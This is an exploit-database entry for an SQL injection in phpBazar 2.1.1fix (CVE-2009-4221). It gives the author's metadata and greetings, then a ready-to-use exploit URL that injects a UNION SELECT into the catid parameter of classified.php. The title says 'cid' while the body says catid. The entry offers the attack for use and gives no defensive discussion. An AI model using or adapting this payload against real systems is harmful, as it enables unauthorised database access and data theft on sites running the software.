phpBazar 2.1.1fix - 'cid' SQL Injection

Author: MizoZ
type: webapps
platform: php
port: 
date_added: 2009-11-27  
date_updated:   
verified: 1  
codes: OSVDB-60844;CVE-2009-4221  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10245.txt  

/*

Author          : MizoZ [from MA]
Group           : EvilWay, evilway[at]mail[dot]com
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka, Dyle !!

MABROOK L3IIIIIIIIIID

*/

The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--